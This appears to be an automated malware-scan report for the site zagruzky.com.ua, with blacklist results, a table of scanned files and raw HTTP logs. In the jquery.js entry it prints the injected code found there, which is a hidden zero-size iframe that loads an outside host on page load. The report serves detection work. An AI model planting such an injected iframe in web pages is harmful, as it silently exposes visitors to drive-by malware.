Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zagruzky.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zagruzky.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zagruzky.com.ua/ | 200 OK Content-Length: 85676 Content-Type: text/html | clean |
http://zagruzky.com.ua/engine/classes/js/jquery.js | 200 OK Content-Length: 72579 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3446 bytes skipped]... atMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); var if3ZVeMI = document.createElement('iframe');if3ZVeMI.name = 'if3ZVeMI';if3ZVeMI.src = 'http://wenbut.fatfree.net/';if3ZVeMI.style.width = '0px';if3ZVeMI.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if3ZVeMI=') == -1) {document.cookie = 'if3ZVeMI=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if3ZVeMI);}}; Antivirus reports:
| ||
http://zagruzky.com.ua/engine/classes/js/dialog.js | 200 OK Content-Length: 47054 Content-Type: application/javascript | clean |
http://zagruzky.com.ua/engine/classes/js/effects.js | 200 OK Content-Length: 13628 Content-Type: application/javascript | clean |
http://zagruzky.com.ua/engine/classes/js/menu.js | 200 OK Content-Length: 2998 Content-Type: application/javascript | clean |
http://zagruzky.com.ua/engine/classes/js/dle_ajax.js | 200 OK Content-Length: 4941 Content-Type: application/javascript | clean |
http://zagruzky.com.ua/engine/classes/js/js_edit.js | 200 OK Content-Length: 11042 Content-Type: application/javascript | clean |
http://mynagor.com/b?size=9&arr=158&l=dlileft&catgry=1&id=129760892&t=_blank | 200 OK Content-Length: 201 | clean |
http://mynagor.com/in.htm?wm=129760892&l=dlileft&crf=cd2L0NmhpiB2HkoTus2tZw%253D%253D | HTTP/1.1 302 Found Connection: close Date: Sat, 04 Oct 2014 08:33:47 GMT Location: https://dosug.nl/?1=1 Server: Resin/3.1.6 Content-Language: en Content-Length: 59 Content-Type: text/html; charset=ISO-8859-1 | clean |
https://dosug.nl/?1=1 | HTTP/1.1 302 Found Connection: close Date: Sat, 04 Oct 2014 08:33:47 GMT Location: https://ladies.dosug.nl/?1=1 Server: nginx/1.4.6 (Ubuntu) Content-Length: 66 Content-Type: text/html; charset=utf-8 | clean |
https://ladies.dosug.nl/?1=1 | 200 OK Content-Length: 5998 Content-Type: text/html | clean |
https://ladies.dosug.nl/iagree18plus.jsp?back=https%3A%2F%2Fladies.dosug.nl%2F%3F1%3D1 | HTTP/1.1 302 Found Cache-Control: no-store Connection: close Date: Sat, 04 Oct 2014 08:33:48 GMT Location: https://ladies.dosug.nl/?1=1 Server: nginx/1.4.6 (Ubuntu) Content-Length: 66 Content-Type: text/html; charset=utf-8 Expires: Sat, 04 Oct 2014 08:33:48 GMT Set-Cookie: BSID=server.dosug2.nlw2; domain=.dosug.nl; path=/ Set-Cookie: PLUS18=true; domain=.dosug.nl; path=/; expires=Sun, 04-Oct-2015 08:33:48 GMT | clean |
http://ladies.dosug.nl/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 04 Oct 2014 08:33:48 GMT Location: https://ladies.dosug.nl/test404page.js Server: Resin/4.0.13 Content-Length: 76 Content-Type: text/html; charset=utf-8 Set-Cookie: BSID=server.dosug2.nlw2; domain=.dosug.nl; path=/ | clean |
https://ladies.dosug.nl/test404page.js | 200 OK Content-Length: 6016 Content-Type: text/html | clean |
https://ladies.dosug.nl/iagree18plus.jsp?back=https%3A%2F%2Fladies.dosug.nl%2Ftest404page.js | HTTP/1.1 302 Found Cache-Control: no-store Connection: close Date: Sat, 04 Oct 2014 08:33:49 GMT Location: https://ladies.dosug.nl/test404page.js Server: nginx/1.4.6 (Ubuntu) Content-Length: 76 Content-Type: text/html; charset=utf-8 Expires: Sat, 04 Oct 2014 08:33:49 GMT Set-Cookie: BSID=server.dosug2.nlw2; domain=.dosug.nl; path=/ Set-Cookie: PLUS18=true; domain=.dosug.nl; path=/; expires=Sun, 04-Oct-2015 08:33:49 GMT | clean |
http://counter.rambler.ru/top100.jcn?2355456 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zagruzky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 08:28:58 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 04 Oct 2014 02:28:58 +0400 GMT
Set-Cookie: PHPSESSID=6vqvb7njc8lgbs8c1s48ub1497; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
GET / HTTP/1.1
Host: zagruzky.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 08:28:58 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 04 Oct 2014 02:28:58 +0400 GMT
Set-Cookie: PHPSESSID=6vqvb7njc8lgbs8c1s48ub1497; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.zagruzky.com.ua; httponly
Second query (visit from search engine):
GET / HTTP/1.1
Host: zagruzky.com.ua
Referer: http://www.google.com/search?q=zagruzky.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zagruzky.com.ua
Referer: http://www.google.com/search?q=zagruzky.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.